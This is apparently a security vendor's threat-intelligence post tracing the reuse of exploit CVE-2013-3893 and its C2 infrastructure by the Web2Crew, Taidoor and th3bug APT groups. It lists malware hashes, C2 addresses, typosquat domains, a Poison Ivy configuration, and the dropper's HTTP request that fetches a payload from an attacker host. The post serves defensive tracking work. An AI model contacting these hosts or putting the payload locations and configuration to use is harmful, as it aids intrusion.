Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

Since we first reported on Operation
DeputyDog
, at least three other Advanced Persistent Threat
(APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use
of the same exploit
to deliver their own payloads to their own
targets. It is not uncommon for APT groups to hand-off exploits to
others, who are lower on the zero-day food chain – especially after
the exploit becomes publicly available. Thus, while the exploit may
be the same, the APT groups using them are not otherwise related.

In addition, APT campaigns may reuse existing infrastructure for new
attacks. There have been reports that the use of CVE-2013-3893 may
have begun in July; however, this determination appears to be based
solely on the fact that the CnC infrastructure used in DeputyDog had
been previously used by the attackers. We have found no indication
that the attackers used CVE-2013-3893 prior to August 23, 2013.

Exploit Reuse

Since the use of CVE-2013-3893 in Operation DeputyDog (which we can
confirm happened by at least August 23, 2013), the
same exploit was used
by different threat actors.

Web2Crew

On September 25, 2013, an actor we call Web2Crew utilized
CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The
exploit was hosted on a server in Taiwan (220.229.238.123) and dropped
a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the
same server. In our recent paper, we document how to extract
intelligence from Poison Ivy that can be used to cluster activity.

The Poison Ivy binary used in this attack was configured with the
following properties:

ID: gua925

Group: gua925

DNS/Port: Direct: login.momoshop.org:443, Direct: 210.17.236.29:443,

Proxy DNS/Port:

Proxy Hijack: No

ActiveX Startup Key:

HKLM Startup Entry:

File Name:

Install Path: C:Documents and SettingsAdministratorDesktoprunrun.exe

Keylog Path: C:Documents and SettingsAdministratorDesktoprunrun

Inject: No

Process Mutex: ;A>6gi3lW

Key Logger Mutex:

ActiveX Startup: No

HKLM Startup: No

Copy To: No

Melt: No

Persistence: No

Keylogger: No

Password: LostC0ntrol2013~2014

This configuration matches with other Web2Crew particularly ‘gua25’
ID. Some previous Web2Crew Poison Ivy samples have been configured
with similar IDs including:

920GUA

 

GUA4.11

GUA

GUA3.7

GUA613

Additionally, the IP address 210.17.236.29 was used to host the
command and control server in this attack. A number of known Web2Crew
domains previously resolved to this same IP address between August 15
and August 29.

DATE DOMAIN

2013-08-15
2013-08-15

flash.wordpreass.net
flash.wordpreass.net

2013-08-15
2013-08-15

search.blogspoct.us
search.blogspoct.us

2013-08-15
2013-08-15

account.twiitter.us
account.twiitter.us

2013-08-15
2013-08-15

search.twiitter.biz
search.twiitter.biz

2013-08-15
2013-08-15

video.twiitter.biz
video.twiitter.biz

2013-08-15
2013-08-15

domain.blogspoct.us
domain.blogspoct.us

2013-08-15
2013-08-15

search.wikiipedia.us
search.wikiipedia.us

2013-08-15
2013-08-15

search.youetube.us
search.youetube.us

2013-08-16
2013-08-16

account.twiitter.us
account.twiitter.us

2013-08-16
2013-08-16

video.twiitter.biz
video.twiitter.biz

2013-08-16
2013-08-16

domain.blogspoct.us
domain.blogspoct.us

2013-08-16
2013-08-16

search.blogspoct.us
search.blogspoct.us

2013-08-16
2013-08-16

search.twiitter.biz
search.twiitter.biz

2013-08-21
2013-08-21

search.youetube.us
search.youetube.us

2013-08-29
2013-08-29

login.twiitter.us
login.twiitter.us

2013-08-29
2013-08-29

account.youetube.us
account.youetube.us

2013-08-29
2013-08-29

login.twiitter.us
login.twiitter.us

2013-08-29
2013-08-29

account.youetube.us
account.youetube.us

We observed the Web2Crew actor targeting a financial institution in
this attack as well as in previous attacks.

Taidoor

The same exploit (CVE-2013-3893) has also been used by another,
separate APT campaign. By at least September 26, 2013 a
compromised Taiwanese Government website
was used to host the
same exploit, however, the payload in this case was Taidoor (not
DeputyDog malware).
The decoded payload has an MD5 of
666603bd2073396b7545d8166d862396. The CnC servers are
msdn.techsofts.com and 203.114.64.202.

We found another instance of CVE-2013-3893 hosted at
www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor
binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor
sample connected to a command and control server at 121.254.176.151.
We found this sample targeting the same financial services firm
targeted by the web2crew actor discussed above.

Both of these samples were the newer versions of Taidoor that we
previously described here.

Th3Bug

The actor we refer to as ‘th3bug
also used CVE-2013-3893 in multiple attacks. Beginning on September
27, compromised websites hosting the Internet Explorer zero-day
redirected victims to download a stage one payload
(496171867521908540a26dc81b969266) from
www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a
single byte key of 0x95.

The stage 1 payload then downloaded a PoisonIvy payload (not
DeputyDog malware)
via the following request:

GET /dev/js/heap.php HTTP/1.1

 

User-Agent: Mozilla/4.0 (compatible)

Host: www.jessearch.com

Cache-Control: no-cache

The PoisonIvy payload then connected to a command and control server
at mm.tc.epac.to.

The deobfuscated stage 1 payload has a MD5 of
4017d0baa83c63ceff87cf634890a33f and was compiled on September 27,
2013. This may indicate that the th3bug actor also customized the IE
zero-day exploit code on September 27, 2013 – well after the actors
responsible for the DeputyDog malware weaponized the same exploit.

Infrastructure Reuse

APT groups also reuse CnC infrastructure. It is not uncommon to see
a payload call back to the same CnC, even through it has been
distributed via different means. For example, although the first
reported use of CVE-2013-3893 in Operation DeputyDog was August 23,
2013, the CnC infrastructure had been used in earlier campaigns.

Specifically, one of the reported DeputyDog command and control
servers located at 180.150.228.102 had been used in a previous attack
in July 2013. During this previous attack, likely executed by the same
actor responsible for the DeputyDog campaign, the 180.150.228.102 IP
hosted a PoisonIvy control server and was used to target a gaming
company as well as high-tech manufacturing company. There is no
evidence to suggest that this July attack using Poison Ivy leveraged
the same CVE-2013-3893 exploit.

We also observed usage of Trojan.APT.DeputyDog malware as early as
March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary
(b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in
both the high-technology manufacturing and finance verticals. This
DeputyDog binary called back to a command and control server at
www.jusched.net. There is also no evidence in this case to suggest
that this attack used the CVE-2013-3893 exploit.

This malware family and the CnC infrastructure is part of an ongoing
campaign. Therefore, the fact that this infrastructure was active
prior to the first reported use of CVE-2013-3893 does not
necessarily indicate that this particular exploit was previously
used.
The actor responsible for the DeputyDog campaign employs a
multiple of malware tools and utilizes a diverse command and control infrastructure.

Conclusion

The activity associated with specific APT campaigns can be clustered
and tracked by unique indicators. There are a variety of different
campaigns that sometimes make use of the same malware (or sometimes
widely available malware such as PoisonIvy) and the same exploits. It
is not uncommon for zero-day exploits to be handed down to additional
APT campaigns after they have already been used.

  • The first observed usage of CVE-2013-3893, in Operation Deputy
    Dog, remains August 23, 2013. However, the C2 infrastructure had
    been used in previous attacks in July 2013.
  • The
    CVE-2013-3893 has been subsequently used by at least three other APT
    campaigns: Taidoor, th3bug, and Web2Crew. However, other than the
    common use of the same exploit, these campaigns are otherwise
    unrelated.
  • We expect that CVE-2013-3893 will continue to
    be handed down to additional APT campaigns and may eventually
    find its way into the cyber-crime underground.

Share this post

Share on facebook
Share on linkedin
Share on print
Share on email

Subscribe to our Monthly Cyber Security Digest

Get monthly content to keep you up to date on the latest news and tips